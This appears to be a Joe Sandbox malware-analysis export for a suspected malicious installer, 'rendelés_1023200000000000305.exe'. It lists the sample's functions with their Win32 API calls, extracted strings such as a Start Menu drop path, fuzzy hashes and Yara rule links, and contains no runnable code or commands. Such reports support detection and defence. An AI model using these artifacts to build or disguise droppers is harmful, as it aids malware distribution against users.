Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: H7B${
API String ID: 590372296-2256286769
Opcode ID: 0185fb71cb0ebac8bb253ddb79263eb6e3c4c27c477fa06c1930d1494c9be16a
Instruction ID: d0bbb34d81c2c7a38b5cdb5171fa906e4f4201ee6cbe22cb0b3272b57562556b
Opcode Fuzzy Hash: 0185fb71cb0ebac8bb253ddb79263eb6e3c4c27c477fa06c1930d1494c9be16a
Instruction Fuzzy Hash: D8B137B0900608FFDF119FA0DD89AAE7B79FB08354F00417AFA45A61A0CB755E52DF68

Function 00404AB5 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 275stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404B04
SetWindowTextW.USER32(00000000,?), ref: 00404B2E
SHBrowseForFolderW.SHELL32(?), ref: 00404BDF
CoTaskMemFree.OLE32(00000000), ref: 00404BEA
lstrcmpiW.KERNEL32(Call,00423748,00000000,?,?), ref: 00404C1C
lstrcatW.KERNEL32(?,Call), ref: 00404C28
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404C3A

Part of subcall function 00405CAC: GetDlgItemTextW.USER32(?,?,00000400,00404C71), ref: 00405CBF

Part of subcall function 004068EF: CharNextW.USER32(?,*?|<>/":,00000000,00000000,75923420,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406952
Part of subcall function 004068EF: CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406961
Part of subcall function 004068EF: CharNextW.USER32(?,00000000,75923420,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406966
Part of subcall function 004068EF: CharPrevW.USER32(?,?,75923420,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406979

GetDiskFreeSpaceW.KERNEL32(00421718,?,?,0000040F,?,00421718,00421718,?,00000001,00421718,?,?,000003FB,?), ref: 00404CFD
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404D18

Part of subcall function 00404E71: lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
Part of subcall function 00404E71: wsprintfW.USER32 ref: 00404F1B
Part of subcall function 00404E71: SetDlgItemTextW.USER32(?,00423748), ref: 00404F2E

Strings

A, xrefs: 00404BD8
Call, xrefs: 00404C16, 00404C1B, 00404C26
H7B, xrefs: 00404BB2
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unsingularly\Udredning, xrefs: 00404C05

Memory Dump Source

Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unsingularly\Udredning$Call$H7B
API String ID: 2624150263-2436674069
Opcode ID: 667bbe0a30595837a03e9c6ce466c2f6c83f7bc5ead90454ae6c6de6e9a81711
Instruction ID: 9155a42c54a3203d4d9709c494e168d8d926bd307d67cbb08bf4d9f42020e7e3
Opcode Fuzzy Hash: 667bbe0a30595837a03e9c6ce466c2f6c83f7bc5ead90454ae6c6de6e9a81711
Instruction Fuzzy Hash: 94A171F1900219ABDB11EFA5CD41AAFB7B8EF84315F11843BF601B62D1D77C8A418B69

Function 00404783 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404821
GetDlgItem.USER32(?,000003E8), ref: 00404835
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404852
GetSysColor.USER32(?), ref: 00404863
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404871
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040487F
lstrlenW.KERNEL32(?), ref: 00404884
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404891
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004048A6
GetDlgItem.USER32(?,0000040A), ref: 004048FF
SendMessageW.USER32(00000000), ref: 00404906
GetDlgItem.USER32(?,000003E8), ref: 00404931
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404974
LoadCursorW.USER32(00000000,00007F02), ref: 00404982
SetCursor.USER32(00000000), ref: 00404985
LoadCursorW.USER32(00000000,00007F00), ref: 0040499E
SetCursor.USER32(00000000), ref: 004049A1
SendMessageW.USER32(00000111,00000001,00000000), ref: 004049D0
SendMessageW.USER32(00000010,00000000,00000000), ref: 004049E2

Strings

Call, xrefs: 00404960
N, xrefs: 0040491F

Memory Dump Source

Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: Call$N
API String ID: 3103080414-3438112850
Opcode ID: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
Instruction ID: 690b4d321b533a2a97605fa3f7bb2423a24794fe1ec6c961d913f822d5f12d1b
Opcode Fuzzy Hash: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
Instruction Fuzzy Hash: AB6181F1900209FFDB109F61CD85A6A7B69FB84304F00813AF705B62E0C7799951DFA9

Function 004062AE Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 130memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406449,?,?), ref: 004062E9
GetShortPathNameW.KERNEL32(?,00426DE8,00000400), ref: 004062F2

Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF

GetShortPathNameW.KERNEL32(?,004275E8,00000400), ref: 0040630F
wsprintfA.USER32 ref: 0040632D
GetFileSize.KERNEL32(00000000,00000000,004275E8,C0000000,00000004,004275E8,?,?,?,?,?), ref: 00406368
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406377
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063AF
SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,004269E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 00406405
GlobalFree.KERNEL32(00000000), ref: 00406416
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040641D

Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe,80000000,00000003), ref: 0040615C
Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E

Strings

uB, xrefs: 0040630B
uB, xrefs: 00406304
[Rename], xrefs: 00406397, 004063A9
%ls=%ls, xrefs: 00406323
mB, xrefs: 004062D7

Memory Dump Source

Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]$mB$uB$uB
API String ID: 2171350718-2295842750
Opcode ID: 07ea5d3dd502240bf86d0c298f94c43ad2335bec49c481c59c36197298e6ebad
Instruction ID: df9b4e9fb9d32bd4c250032a1d399944af7a2e4c2f0bdec2b7d3959d12e60cc8
Opcode Fuzzy Hash: 07ea5d3dd502240bf86d0c298f94c43ad2335bec49c481c59c36197298e6ebad
Instruction Fuzzy Hash: B8314331200315BBD2206B619D49F5B3AACEF85704F16003BFD02FA2C2EA7DD82186BD

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00429260,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
Instruction ID: e2f9fea5dfd6f059ba8eeb08e8d10ac227d01a2162b8a260283931f50cd0bfbf
Opcode Fuzzy Hash: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
Instruction Fuzzy Hash: 33418B71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA2A0C7349A55DFA4

Function 004056CA Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
lstrcatW.KERNEL32(00422728,004030A8,004030A8,00422728,00000000,00000000,00000000), ref: 00405725
SetWindowTextW.USER32(00422728,00422728), ref: 00405737
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785

Part of subcall function 004066A5: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
Part of subcall function 004066A5: lstrlenW.KERNEL32(Call,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4

Strings

('B, xrefs: 004056EB

Memory Dump Source

Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: MessageSendlstrlen$lstrcat$TextWindow
String ID: ('B
API String ID: 1495540970-2332581011
Opcode ID: da0887550f177a20a5adca650a80eb3065253b4758cf57a6ba66e38fd01475e6
Instruction ID: 7f52a71d89202be05388d2ae90ba5930d13dcc1e6093ad3ff4eaa481a322a782
Opcode Fuzzy Hash: da0887550f177a20a5adca650a80eb3065253b4758cf57a6ba66e38fd01475e6
Instruction Fuzzy Hash: C6217A71900518FACB119FA5DD84A8EBFB8EB45360F10857AF904B62A0D67A4A509F68

Function 0040462B Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00404648
GetSysColor.USER32(00000000), ref: 00404686
SetTextColor.GDI32(?,00000000), ref: 00404692
SetBkMode.GDI32(?,?), ref: 0040469E
GetSysColor.USER32(?), ref: 004046B1
SetBkColor.GDI32(?,?), ref: 004046C1
DeleteObject.GDI32(?), ref: 004046DB
CreateBrushIndirect.GDI32(?), ref: 004046E5

Memory Dump Source

Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
Instruction ID: e78b8cc9c8042372c9a7340b9b8aa9b23ded286a9f8ddc7240a2e2d8bd1f46c0
Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
Instruction Fuzzy Hash: DE2197715007049FC7309F28D908B5BBBF8AF42714F008D2EE992A22E1D739D944DB58

Function 004026EC Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 00402758
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC

Part of subcall function 00406239: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0040624F

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878

Strings

9, xrefs: 0040273B

Memory Dump Source

Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
Instruction ID: 581cf2785626502de532f206a1de9da9d9b8d20bcd24121b7f7bd1133decb9a2
Opcode Fuzzy Hash: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
Instruction Fuzzy Hash: CE51FB75D00219AADF20EF95CA88AAEBB75FF04304F50417BE541B62D4D7B49D82CB58

Function 004068EF Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,00000000,75923420,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406952
CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406961
CharNextW.USER32(?,00000000,75923420,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406966
CharPrevW.USER32(?,?,75923420,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406979

Strings

*?|<>/":, xrefs: 00406941
C:\Users\user\AppData\Local\Temp\, xrefs: 004068F0

Memory Dump Source

Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-1201062745
Opcode ID: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
Instruction ID: d28fb8c2eefe6f61a155ceb01790bbf8b21f4710aa7989e54d8eeb8481a577c9
Opcode Fuzzy Hash: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
Instruction Fuzzy Hash: 2611089580061295DB303B18CC40BB762F8AF99B50F12403FE98A776C1E77C4C9286BD

Function 0040302E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000), ref: 00403049
GetTickCount.KERNEL32 ref: 00403067
wsprintfW.USER32 ref: 00403095

Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8,004030A8,00422728,00000000,00000000,00000000), ref: 00405725
Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785

CreateDialogParamW.USER32(0000006F,00000000,00402F93,00000000), ref: 004030B9
ShowWindow.USER32(00000000,00000005), ref: 004030C7

Part of subcall function 00403012: MulDiv.KERNEL32(0004274B,00000064,000458C4), ref: 00403027

Strings

... %d%%, xrefs: 0040308F

Memory Dump Source

Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
String ID: ... %d%%
API String ID: 722711167-2449383134
Opcode ID: a65563718f57099a27635650194dd277da09fbe66beefc8d93bb4be83c5e7891
Instruction ID: 5af6bf9b0b70cf9307c1258d0e5a667b07be53d22b58a3258066d7aee54b172b
Opcode Fuzzy Hash: a65563718f57099a27635650194dd277da09fbe66beefc8d93bb4be83c5e7891
Instruction Fuzzy Hash: E8018E70553614DBC7317F60AE08A5A3EACAB00F06F54457AF841B21E9DAB84645CBAE

Function 00404F7F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404F9A
GetMessagePos.USER32 ref: 00404FA2
ScreenToClient.USER32(?,?), ref: 00404FBC
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404FCE
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404FF4

Strings

f, xrefs: 00404FD0

Memory Dump Source

Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
